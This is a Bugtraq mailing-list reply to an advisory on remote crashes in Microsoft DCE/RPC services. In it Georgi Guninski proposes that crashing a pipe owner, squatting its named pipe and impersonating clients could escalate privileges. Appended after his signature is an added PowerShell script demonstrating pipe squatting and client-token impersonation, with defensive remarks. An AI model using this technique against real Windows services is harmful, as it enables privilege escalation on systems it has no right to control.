Bugtraq mailing list archives
Re: Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC daemons
From: Georgi Guninski <guninski () guninski com>
Date: Wed, 01 Aug 2001 20:51:36 +0300
Todd Sabin wrote:
> BindView Security Advisory
> --------
> Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC daemons
>
> Issue Date: July 30, 2001
> Contact: tsabin () razor bindview com
> Topic: Many Microsoft DCE/RPC servers are vulnerable to remote DoS attacks
>
> Overview: Many DCE/RPC servers don't do proper parameter validation, and can be crashed by sending an improperly formatted request.
There is some probability this may be more than just a DoS if an attacker can execute programs on the server. My idea is to crash a process which owns a named pipe, create a named pipe with the same name, and then wait for or force some other service or user to write to the false pipe and then impersonate it, which may lead to elevation of privileges.

Details on a similar problem, in which crashing LSASS.EXE leads to elevation of privileges, are available at:
http://www.guninski.com/dr07.html

I have not verified whether this idea will work in BindView's case.

Georgi Guninski
http://www.guninski.com
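The pipe-squatting step of the idea in the reply above, as an added example that is not code from the advisory or from Georgi Guninski. It assumes Windows with PowerShell 5.0 or later and .NET's System.IO.Pipes classes; the pipe name is a hypothetical placeholder (in the attack it would be the name the crashed service owned), and the "victim" client is a constructed stand-in that runs as the same user, so in this self-test the impersonated identity is simply your own account.

```powershell
# Added example (not from the advisory or from Georgi Guninski): squatting a
# named pipe after its owner has crashed, then impersonating whoever connects.
# Requires Windows and PowerShell 5.0+. The pipe name is a hypothetical
# placeholder; a real attack would reuse the crashed service's pipe name.
$pipeName = 'example_squatted_pipe'

# 1. Take the name. CreateNamedPipe refuses a name another process already
#    owns (ERROR_ACCESS_DENIED), so this only succeeds once the legitimate
#    owner is gone, which is exactly what the crash buys the attacker.
$server = [System.IO.Pipes.NamedPipeServerStream]::new(
    $pipeName,
    [System.IO.Pipes.PipeDirection]::InOut,
    1,                                               # one instance is enough
    [System.IO.Pipes.PipeTransmissionMode]::Byte,
    [System.IO.Pipes.PipeOptions]::None)

# 2. Constructed "victim": a separate process that connects to the pipe by
#    name, as a service or user that trusts the name would. It opens the pipe
#    at Impersonation level, which is what lets the server act as the client.
#    (Here the victim runs as the same user as the squatter; in the attack it
#    would be a more privileged principal.)
$victim = Start-Job -ArgumentList $pipeName -ScriptBlock {
    param($name)
    Start-Sleep -Seconds 2
    $c = [System.IO.Pipes.NamedPipeClientStream]::new(
        '.', $name,
        [System.IO.Pipes.PipeDirection]::InOut,
        [System.IO.Pipes.PipeOptions]::None,
        [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
    $c.Connect(10000)
    $c.WriteByte(0x41)      # any write; the connection itself is what matters
    $c.Dispose()
}

# 3. Wait for the duped client, then impersonate it.
$server.WaitForConnection()
$clientAccount = $server.GetImpersonationUserName()   # account of the connected client

# RunAsClient wraps ImpersonateNamedPipeClient / RevertToSelf around the
# delegate: whatever runs inside holds the client's token on this thread.
$state = @{ IdentityWhileImpersonating = $null }
$server.RunAsClient({
    $state.IdentityWhileImpersonating =
        [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
})

$server.Disconnect()
$server.Dispose()
Receive-Job -Job $victim -Wait -AutoRemoveJob | Out-Null

"Squatting pipe \\.\pipe\$pipeName"
"Connected client account           : $clientAccount"
"Thread identity while impersonating: $($state.IdentityWhileImpersonating)"
"Own identity after RevertToSelf    : $([System.Security.Principal.WindowsIdentity]::GetCurrent().Name)"
```

Two checks a practitioner will want. First, the client side decides how much the squatter gets: a client that opens the pipe at Identification or Anonymous level (the last constructor argument above) hands the server a token it can inspect but not use to open securable objects, so services that connect to pipes by name should not default to Impersonation. Second, Windows Server 2003 and Windows 2000 SP4 introduced the SeImpersonatePrivilege requirement, without which a low-privileged squatter no longer obtains an Impersonation-level token; the systems the 2001 advisory covered had no such check, which is what made the idea in the reply worth taking seriously.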